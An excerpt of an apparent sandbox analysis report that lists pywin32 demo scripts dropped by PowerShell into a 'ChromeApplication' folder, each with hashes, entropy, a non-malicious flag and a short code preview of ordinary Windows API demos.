                                                                                                                                                                                                  Preview:import time..import win32con.import win32console..virtual_keys = {}.for k, v in list(win32con.__dict__.items()):. if k.startswith("VK_"):. virtual_keys[v] = k..free_console = True.try:. win32console.AllocConsole().except win32console.error as exc:. if exc.winerror != 5:. raise. ## only free console if one was created successfully. free_console = False..stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE).stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE).newbuffer = win32console.CreateConsoleScreenBuffer().newbuffer.SetConsoleActiveScreenBuffer().newbuffer.SetConsoleTextAttribute(. win32console.FOREGROUND_RED. | win32console.FOREGROUND_INTENSITY. | win32console.BACKGROUND_GREEN. | win32console.BACKGROUND_INTENSITY.).newbuffer.WriteConsole("This is a new screen buffer\n")..## test setting screen buffer and window size.## screen buffer size cannot be smaller than window size.window_size = newbuffer.GetConsoleScreenBuffe

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32cred_demo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2747
                                                                                                                                                                                                  Entropy (8bit):5.085452982327908
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:cfg1SDMmh+nJ2e5bke5RnBzgm5go7Nke4VeLWeNPRLe712kDACXjLtPCPpyDku+h:kg1dgoJ22kPo7qlVeWYPRLk1PDACzpCb
                                                                                                                                                                                                  MD5:B2DD13257D87B2D861BAD12F9BE7D17B
                                                                                                                                                                                                  SHA1:B48DFABE4E44059CF9DDB076382928CA891189D3
                                                                                                                                                                                                  SHA-256:E68685BDC90CC014E4AA3BA4F6FC988E945F576A35DEB2BFFD1C69B06C30F7F8
                                                                                                                                                                                                  SHA-512:3A59D0B5DCBFB5C325338B5BFD398E2E289805D2B2C3B43DE7DD2951D1A1444C032CDE2EA2F962B01EC93BB49279064269DF07BCA24DEF9160418C2E0A5852E8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""".Demonstrates prompting for credentials, saving, and loggging on with marshalled credential..Also shows how to load user's profile."""..import win32api.import win32con.import win32cred.import win32net.import win32profile.import win32security..## Prompt for a username/pwd for local computer.uiinfo = {. "MessageText": "Enter credentials for local machine",. "CaptionText": "win32cred_demo.py",.}.target, pwd, save = win32cred.CredUIPromptForCredentials(. TargetName=win32api.GetComputerName(),. AuthError=0,. Flags=win32cred.CREDUI_FLAGS_DO_NOT_PERSIST. | win32cred.CREDUI_FLAGS_SHOW_SAVE_CHECK_BOX,. Save=False,. UiInfo=uiinfo,.)..attrs = [. {"Keyword": "attr1", "Flags": 0, "Value": "unicode data"},. {"Keyword": "attr2", "Flags": 0, "Value": b"character data"},.].cred = {. "Comment": "Created by win32cred_demo.py",. "UserName": target,. "TargetAlias": None,. "TargetName": target,. "CredentialBlob": pwd,. "Flags": win32cred.CRED_FLAGS_USERNAME

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32fileDemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1381
                                                                                                                                                                                                  Entropy (8bit):4.808237224456068
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:qIRznj1ZjkzgY87MNgghZU+7Vx/YhVwfTDw/LsnOEw3a5dDTVtpYPGPdDTG/b1db:dLkz0gNghK/vfTkPK/Vr0bHh7Os
                                                                                                                                                                                                  MD5:E7B5B82C93BC5D6291AE5E98FEFE6773
                                                                                                                                                                                                  SHA1:277255439133F6941FCB2BEBEBFFC3020AB9DEBA
                                                                                                                                                                                                  SHA-256:4D203DB1FC60406DAAD07C19BDFA3F52A71B7D16E25BA0D56CCCD2818497AD87
                                                                                                                                                                                                  SHA-512:6C0BE979ED9D3B394244679413F7C5EDAD3D4309417B5E1AD82273AE2E2668BBE05407298BBD3A9BEEC85D6A7B3F3D92DDE37009E86588CD7CEF37E17EC56816
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is a "demo" of win32file - it used to be more a test case than a.# demo, so has been moved to the test directory...import os..# Please contribute your favourite simple little demo..import win32api.import win32con.import win32file...# A very simple demo - note that this does no more than you can do with.# builtin Python file objects, so for something as simple as this, you.# generally *should* use builtin Python objects. Only use win32file etc.# when you need win32 specific features not available in Python..def SimpleFileDemo():. testName = os.path.join(win32api.GetTempPath(), "win32file_demo_test_file"). if os.path.exists(testName):. os.unlink(testName). # Open the file for writing.. handle = win32file.CreateFile(. testName, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None. ). test_data = "Hello\0there".encode("ascii"). win32file.WriteFile(handle, test_data). handle.Close(). # Open it for reading.. handle = win32file.Cre

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32gui_demo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5028
                                                                                                                                                                                                  Entropy (8bit):4.86015472894631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:otvodpuc/LMExtDYu57+AJATWADoFpW2b/IL2JeieSvqE:Kvvc/Ljl5TFpW2b/IL2JeieSvqE
                                                                                                                                                                                                  MD5:B8AB179A28507872DFD508DF57A317E7
                                                                                                                                                                                                  SHA1:CB997291BEBC67B828994AEDED8944D25CF66445
                                                                                                                                                                                                  SHA-256:4619866C59EEF14BDB582B8A48CC18CCD75E67C2F64913C805B5A3C930BB2C4B
                                                                                                                                                                                                  SHA-512:21008AA2DD1695D584694C0E5D59DF0A341DA592D12FCD44F70F754F22D999BEA2A96B5AE735724EC21A9BC72E20DF7EE31824D2101F8036BF66396BAF3AA9C5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# The start of a win32gui generic demo..# Feel free to contribute more demos back ;-)..import math.import random.import time..import win32api.import win32con.import win32gui...def _MyCallback(hwnd, extra):. hwnds, classes = extra. hwnds.append(hwnd). classes[win32gui.GetClassName(hwnd)] = 1...def TestEnumWindows():. windows = []. classes = {}. win32gui.EnumWindows(_MyCallback, (windows, classes)). print(. "Enumerated a total of %d windows with %d classes". % (len(windows), len(classes)). ). if "tooltips_class32" not in classes:. print("Hrmmmm - I'm very surprised to not find a 'tooltips_class32' class.")...def OnPaint_1(hwnd, msg, wp, lp):. dc, ps = win32gui.BeginPaint(hwnd). win32gui.SetGraphicsMode(dc, win32con.GM_ADVANCED). br = win32gui.CreateSolidBrush(win32api.RGB(255, 0, 0)). win32gui.SelectObject(dc, br). angle = win32gui.GetWindowLong(hwnd, win32con.GWL_USERDATA). win32gui.SetWindowLong(hwnd, win32con.GWL_USERDA

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32gui_devicenotify.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3829
                                                                                                                                                                                                  Entropy (8bit):5.010125673110548
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:quG+AnP3C0axcdbC6DemA2FqcxD2/nccvjXHVFKOw/mo5GyG0:quEPSXOG6DemA2Fq47U7HVFxw/mw/
                                                                                                                                                                                                  MD5:F78AB5C17E8D69884B433067B37A478A
                                                                                                                                                                                                  SHA1:F390AF6B0116C94F3C837C54437109D91A4E3074
                                                                                                                                                                                                  SHA-256:3D09EAC656558AB7799B73B83AF3F3CA14756296B93269CE6DD9A20EBAC61E95
                                                                                                                                                                                                  SHA-512:ED028D0514998FD26BCEE418234872A82014506EBE494F782D6AA094F59E7D1894004EB463373DCA9E0349C5E3FD79E2EB52AA9669D4943C3058333C9A7FD9C8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Demo RegisterDeviceNotification etc. Creates a hidden window to receive.# notifications. See serviceEvents.py for an example of a service doing.# that..import sys.import time..import win32api.import win32con.import win32file.import win32gui.import win32gui_struct.import winnt..# These device GUIDs are from Ioevent.h in the Windows SDK. Ideally they.# could be collected somewhere for pywin32....GUID_DEVINTERFACE_USB_DEVICE = "{A5DCBF10-6530-11D2-901F-00C04FB951ED}"...# WM_DEVICECHANGE message handler..def OnDeviceChange(hwnd, msg, wp, lp):. # Unpack the 'lp' into the appropriate DEV_BROADCAST_* structure,. # using the self-identifying data inside the DEV_BROADCAST_HDR.. info = win32gui_struct.UnpackDEV_BROADCAST(lp). print("Device change notification:", wp, str(info)). if (. wp == win32con.DBT_DEVICEQUERYREMOVE. and info.devicetype == win32con.DBT_DEVTYP_HANDLE. ):. # Our handle is stored away in the structure - just close it. print("De

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32gui_dialog.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15720
                                                                                                                                                                                                  Entropy (8bit):4.774516514388496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lptehicVSsdWi2Glkdqfn9NvWevP2RkypmcZJeA:lHuiYn/+7RWcZJeA
                                                                                                                                                                                                  MD5:7FE3A04708C7BFC598956C5E83EF9031
                                                                                                                                                                                                  SHA1:1A01D40A3DFAD3D6B8B14570CCCB92B7DBAE4F20
                                                                                                                                                                                                  SHA-256:95D3AC68ED6E7E5770E33AF40A1A6FD2A805EE9223D53624ED42FD6AEDAE0FAA
                                                                                                                                                                                                  SHA-512:6241EDA928BF49A34049818555A4F9897ADFA894612B1285463FC28DEC0A2AD387051DB02E002109AB8A675C1F7287E1908F67D1213F2F438CC5CEB190E507F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo of a fairly complex dialog..#.# Features:.# * Uses a "dynamic dialog resource" to build the dialog..# * Uses a ListView control..# * Dynamically resizes content..# * Uses a second worker thread to fill the list..# * Demostrates support for windows XP themes...# If you are on Windows XP, and specify a '--noxp' argument, you will see:.# * alpha-blend issues with icons.# * The buttons are "old" style, rather than based on the XP theme..# Hence, using:.# import winxpgui as win32gui.# is recommended..# Please report any problems..import sys..if "--noxp" in sys.argv:. import win32gui.else:. import winxpgui as win32gui..import array.import os.import queue.import struct..import commctrl.import win32api.import win32con.import win32gui_struct.import winerror..IDC_SEARCHTEXT = 1024.IDC_BUTTON_SEARCH = 1025.IDC_BUTTON_DISPLAY = 1026.IDC_LISTBOX = 1027..WM_SEARCH_RESULT = win32con.WM_USER + 512.WM_SEARCH_FINISHED = win32con.WM_USER + 513...class _WIN32MASKEDSTRUCT:. def __init__

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32gui_menu.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16112
                                                                                                                                                                                                  Entropy (8bit):4.611080780743955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:kIV+2THm+d4iG1UGf2HmlL16Idc8uITjPjvfEEgIBXFNXIDz29AJ5JSIbB6BOnUy:kGHLy1UNmlLQkgEgI1SzMI5LbB6BOv
                                                                                                                                                                                                  MD5:2DD553D7A4EB19590D28DB62428B4D46
                                                                                                                                                                                                  SHA1:B391B8AFAE0A41869680637C0C2D549787B2A244
                                                                                                                                                                                                  SHA-256:6F6DF0AEDB7AE4CC0DA6A063CBB8A94A1333A0650B0DD016B20CCE37C9BAA7D8
                                                                                                                                                                                                  SHA-512:675A5D0192ED09F1FB8882BFEEAC907B75B0F61E53B1B0BE11B8E502BD417966AC79858706B32B088BA668B8BCE2B6CCFB0D70497291A6C67F7D4CCB2BB2C306
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Demonstrates some advanced menu concepts using win32gui..# This creates a taskbar icon which has some fancy menus (but note that.# selecting the menu items does nothing useful - see win32gui_taskbar.py.# for examples of this...# NOTE: This is a work in progress. Todo:.# * The "Checked" menu items don't work correctly - I'm not sure why..# * No support for GetMenuItemInfo...# Based on Andy McKay's demo code..from win32api import *..# Try and use XP features, so we get alpha-blending etc..try:. from winxpgui import *.except ImportError:. from win32gui import *..import array.import os.import struct.import sys..import win32con.from win32gui_struct import *..this_dir = os.path.split(sys.argv[0])[0]...class MainWindow:. def __init__(self):. message_map = {. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. win32con.WM_USER + 20: self.OnTaskbarNotify,. # owner-draw related handlers.. win32con.W

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32gui_taskbar.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5206
                                                                                                                                                                                                  Entropy (8bit):4.754958557193041
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:T9gvS0tVbYFk45y2aR6tgHtZGtX8kemI4sBKzmrHIwi:B+tVq7Y2aRHwvI4sQzvwi
                                                                                                                                                                                                  MD5:BD7764F8D17FFCA4629B558458642734
                                                                                                                                                                                                  SHA1:AD2FFDCE97F8A154C6809CA6EA9376CE5DAEBFB3
                                                                                                                                                                                                  SHA-256:3203AB7E1D178EFBFA1AB964B3A010884E6BD86720DD0F55A6DC9D1243F49F5E
                                                                                                                                                                                                  SHA-512:BFF7B59948A1D044CBB311728C95F58E28EE3E177164650BEAE232DB100E3898BA82B538852A139A2621ADB48F2BF0754332B3B506AE5E9A801A04141971EF53
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Creates a task-bar icon. Run from Python.exe to see the.# messages printed..import os.import sys..import win32api.import win32con.import win32gui.import winerror...class MainWindow:. def __init__(self):. msg_TaskbarRestart = win32gui.RegisterWindowMessage("TaskbarCreated"). message_map = {. msg_TaskbarRestart: self.OnRestart,. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. win32con.WM_USER + 20: self.OnTaskbarNotify,. }. # Register the Window class.. wc = win32gui.WNDCLASS(). hinst = wc.hInstance = win32api.GetModuleHandle(None). wc.lpszClassName = "PythonTaskbarDemo". wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW. wc.hCursor = win32api.LoadCursor(0, win32con.IDC_ARROW). wc.hbrBackground = win32con.COLOR_WINDOW. wc.lpfnWndProc = message_map # could also specify a wndproc... # Don't blow up if class already registered

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32netdemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8984
                                                                                                                                                                                                  Entropy (8bit):4.399025941579387
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ITaxEtPTFlOLG2zaBxuzJJXKz2MP7EKavZ8ozm/9UOGHjm35lmSV7b66wN6ChcEi:ImxEZTSEMT+28Fonw9x9ljYp1XC/Wxli
                                                                                                                                                                                                  MD5:380BD910ADE57D5EED72B6D8CE27AF8C
                                                                                                                                                                                                  SHA1:AF570E6EACEC750D47905AD0ED08A3BFC3B916A5
                                                                                                                                                                                                  SHA-256:04E8DC68E6C79B52F87B0AB5A1F4112AB57BFFCFB4C57D3D2D645623C23D665B
                                                                                                                                                                                                  SHA-512:93C47071AAF180C5F4E0A6BF9BF581F7EE8593F23933450C0A06D60DEC3DB03974EE9472AD3E2899975336633BAC4A69698B91BB8A22CE2701A3D7E02460A802
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import getopt.import sys.import traceback..import win32api.import win32net.import win32netcon.import win32security..verbose_level = 0..server = None # Run on local machine....def verbose(msg):. if verbose_level:. print(msg)...def CreateUser():. "Creates a new test user, then deletes the user". testName = "PyNetTestUser". try:. win32net.NetUserDel(server, testName). print("Warning - deleted user before creating it!"). except win32net.error:. pass.. d = {}. d["name"] = testName. d["password"] = "deleteme". d["priv"] = win32netcon.USER_PRIV_USER. d["comment"] = "Delete me - created by Python test code". d["flags"] = win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT. win32net.NetUserAdd(server, 1, d). try:. try:. win32net.NetUserChangePassword(server, testName, "wrong", "new"). print("ERROR: NetUserChangePassword worked with a wrong password!"). except win32net.error:. pas

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32rcparser_demo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2809
                                                                                                                                                                                                  Entropy (8bit):4.910903276980213
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:qv5dZhR3kNn5VCOYPy4GQ+zSO3I6fmBUDNiKjt6kOVp1JqUTD:qlR3e5Va64GQW3IUEUDN/ckkwUv
                                                                                                                                                                                                  MD5:CD8D88B9E04BD140A2CE1C48E899A250
                                                                                                                                                                                                  SHA1:7AE9354E81A559AE2C28E624BF2419CE12F6933D
                                                                                                                                                                                                  SHA-256:70D08CC0A5E47530DA0E45F975264B795A8473B6A2646593041F527DC2661CA0
                                                                                                                                                                                                  SHA-512:6E1E5EB57AF9AD39B51B01EC6CD0A923615B80C5D5D4490792057B3C551050B16C8584196B058E6DB48616F195552332534DD758AA5D99E062C8919D2379652C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo of the win32rcparser module and using win32gui..import os..import commctrl.import win32api.import win32con.import win32gui.import win32rcparser..this_dir = os.path.abspath(os.path.dirname(__file__)).g_rcname = os.path.abspath(. os.path.join(this_dir, "..", "test", "win32rcparser", "test.rc").)..if not os.path.isfile(g_rcname):. raise RuntimeError("Can't locate test.rc (should be at '%s')" % (g_rcname,))...class DemoWindow:. def __init__(self, dlg_template):. self.dlg_template = dlg_template.. def CreateWindow(self):. self._DoCreate(win32gui.CreateDialogIndirect).. def DoModal(self):. return self._DoCreate(win32gui.DialogBoxIndirect).. def _DoCreate(self, fn):. message_map = {. win32con.WM_INITDIALOG: self.OnInitDialog,. win32con.WM_CLOSE: self.OnClose,. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. }. return fn(0, self.dlg_template, 0, message_m

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32servicedemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):579
                                                                                                                                                                                                  Entropy (8bit):4.864055610075746
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:4L/LeAgAYADWcC1DuJ4ilQw+47lgrwS4pLpvn:dAtCceDuJrQd4pQn4pLpvn
                                                                                                                                                                                                  MD5:EE907338D6390DF677EB03E8B8EC1086
                                                                                                                                                                                                  SHA1:E374C563078378EC5C4F69797569ACBFFEB0D51B
                                                                                                                                                                                                  SHA-256:8B4ED673B62CF16AE39C308739A39C3B14BB3B567E85CE59224451041D0F5EEC
                                                                                                                                                                                                  SHA-512:48D03393639F46EFAFAA42A22430AD9056D35C943FDD84C235A37C0774C95DB26CD5F07E0582753DC051E81AC56744980A7260DE8BBCCE7A0B3327CAC2BA9412
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32con.import win32service...def EnumServices():. resume = 0. accessSCM = win32con.GENERIC_READ. accessSrv = win32service.SC_MANAGER_ALL_ACCESS.. # Open Service Control Manager. hscm = win32service.OpenSCManager(None, None, accessSCM).. # Enumerate Service Control Manager DB.. typeFilter = win32service.SERVICE_WIN32. stateFilter = win32service.SERVICE_STATE_ALL.. statuses = win32service.EnumServicesStatus(hscm, typeFilter, stateFilter). for short_name, desc, status in statuses:. print(short_name, desc, status)...EnumServices().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32ts_logoff_disconnected.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):982
                                                                                                                                                                                                  Entropy (8bit):4.754642610339019
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:SIGvZ5wLuzL7SZBqSKBkd9ovyNl3gfFyuxU2NYT4oan0ux/9duzU7gflQlyqTkd4:GvZ5VSZISVdOyaNn06dT0flQAdyCYsL6
                                                                                                                                                                                                  MD5:0C05782F9271A7CC8A5C02ECC2038C5C
                                                                                                                                                                                                  SHA1:2939D4168D724A07F9B9DDCFF507A33F208FE2A1
                                                                                                                                                                                                  SHA-256:28E8F3FAF3572494B50DB3B26A200F7A8589AC135CA8A8661AC3FCA999CC2A00
                                                                                                                                                                                                  SHA-512:84CA26CD7A55D2427C96400B90E2C781786C68396A7E240CA7A2F212894CB44B12F4BBDC4F57B9772628A7C204AD6F2039B1D22D4DE867DB3C3ED4C941275912
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Finds any disconnected terminal service sessions and logs them off""".import pywintypes.import win32ts.import winerror..sessions = win32ts.WTSEnumerateSessions(win32ts.WTS_CURRENT_SERVER_HANDLE).for session in sessions:. """. WTS_CONNECTSTATE_CLASS: WTSActive,WTSConnected,WTSConnectQuery,WTSShadow,WTSDisconnected,. WTSIdle,WTSListen,WTSReset,WTSDown,WTSInit. """. if session["State"] == win32ts.WTSDisconnected:. sessionid = session["SessionId"]. username = win32ts.WTSQuerySessionInformation(. win32ts.WTS_CURRENT_SERVER_HANDLE, sessionid, win32ts.WTSUserName. ). print("Logging off disconnected user:", username). try:. win32ts.WTSLogoffSession(win32ts.WTS_CURRENT_SERVER_HANDLE, sessionid, True). except pywintypes.error as e:. if e.winerror == winerror.ERROR_ACCESS_DENIED:. print("Can't kill that session:", e.strerror). else:. raise.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32wnet\testwnet.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4317
                                                                                                                                                                                                  Entropy (8bit):4.4834970191394135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:/xp0BWGNtCJT5kD166wm0ppbSKNYD4mA6drMg:/EB9tCJSDDUWDD4mA6dog
                                                                                                                                                                                                  MD5:FA8C4B2B1B0237E97E3633E46B2CB01C
                                                                                                                                                                                                  SHA1:43061EC48EF63A4A826CAF08ADD75B7E400143DD
                                                                                                                                                                                                  SHA-256:CAFB4C3B818FD035E620B4B78EE052637B72964CF4B307EED50439C85DDB764D
                                                                                                                                                                                                  SHA-512:EF119E7443E3D6A48922496109B92D0F82283BFF78957BFAF7693FB723E885CA85F8582E8AAA02A77346A10884B241AFEBCCD08BA5E89565936953062DBBAA35
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import win32api.import win32wnet.from winnetwk import *..possible_shares = []...def _doDumpHandle(handle, level=0):. indent = " " * level. while 1:. items = win32wnet.WNetEnumResource(handle, 0). if len(items) == 0:. break. for item in items:. try:. if item.dwDisplayType == RESOURCEDISPLAYTYPE_SHARE:. print(indent + "Have share with name:", item.lpRemoteName). possible_shares.append(item). elif item.dwDisplayType == RESOURCEDISPLAYTYPE_GENERIC:. print(. indent + "Have generic resource with name:", item.lpRemoteName. ). else:. # Try generic!. print(indent + "Enumerating " + item.lpRemoteName, end=" "). k = win32wnet.WNetOpenEnum(. RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, item. ).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32wnet\winnetwk.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3193
                                                                                                                                                                                                  Entropy (8bit):4.412241136607424
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:J5O5v49qXZog2AKXC30YbYL38ltW3bIs8poj5gWLYfykTB3A0/4eql:y50qz27CkYbYT8ltWLI7poSgEJBwiil
                                                                                                                                                                                                  MD5:852EC0289B940F026C47130C5914B881
                                                                                                                                                                                                  SHA1:C6CA600BFD5F20D0252C945DB821AA00D4C8E8E2
                                                                                                                                                                                                  SHA-256:7C6EB6F55940269610519A1B40FAC617905022F76907D252E0229AACA2A02794
                                                                                                                                                                                                  SHA-512:DD654998EEB22ACB9D1BA3A6F141116959071BDC42F87C471997C66CC83567E3F2E7B0B956922E10B8E94A49162336AD07A2624239901343D2429EB330DE5670
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from d:\mssdk\include\winnetwk.h.WNNC_NET_MSNET = 0x00010000.WNNC_NET_LANMAN = 0x00020000.WNNC_NET_NETWARE = 0x00030000.WNNC_NET_VINES = 0x00040000.WNNC_NET_10NET = 0x00050000.WNNC_NET_LOCUS = 0x00060000.WNNC_NET_SUN_PC_NFS = 0x00070000.WNNC_NET_LANSTEP = 0x00080000.WNNC_NET_9TILES = 0x00090000.WNNC_NET_LANTASTIC = 0x000A0000.WNNC_NET_AS400 = 0x000B0000.WNNC_NET_FTP_NFS = 0x000C0000.WNNC_NET_PATHWORKS = 0x000D0000.WNNC_NET_LIFENET = 0x000E0000.WNNC_NET_POWERLAN = 0x000F0000.WNNC_NET_BWNFS = 0x00100000.WNNC_NET_COGENT = 0x00110000.WNNC_NET_FARALLON = 0x00120000.WNNC_NET_APPLETALK = 0x00130000.WNNC_NET_INTERGRAPH = 0x00140000.WNNC_NET_SYMFONET = 0x00150000.WNNC_NET_CLEARCASE = 0x00160000.WNNC_NET_FRONTIER = 0x00170000.WNNC_NET_BMC = 0x00180000.WNNC_NET_DCE = 0x00190000.WNNC_NET_DECORB = 0x00200000.WNNC_NET_PROTSTOR = 0x00210000.WNNC_NET_FJ_REDIR = 0x00220000.WNNC_NET_DISTINCT = 0x00230000.WNNC_NET_TWINS = 0x00240000.WNNC_NET_RDR2SAMPLE = 0x00250000.RESOURCE_CONNECTED

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\winprocess.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7364
                                                                                                                                                                                                  Entropy (8bit):4.612277715258723
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:djYESt2D2KXSt7kDgt7/hJYyu8wqNP1mhr:dE1UNXSt7kDgtT9XP1mhr
                                                                                                                                                                                                  MD5:8E6684A1613B87B8EADBDAF4CECE9B9B
                                                                                                                                                                                                  SHA1:9203CB302F86AE37C239ED6826233665F2C7C979
                                                                                                                                                                                                  SHA-256:B1AC447688BC6BD9824ECABED1A5F1FC41E0B1161192DE8036FE9D9E41F91D96
                                                                                                                                                                                                  SHA-512:DA4E3572592A043C73FBB00DAA18D64DFB79994CDE4C1F120C072CB38C3B2298BDA282D933B97052A83B541789D09C464CE59E9939562F2F51584BF5426A7A4D
                                                                                                                                                                                                  Malicious:false
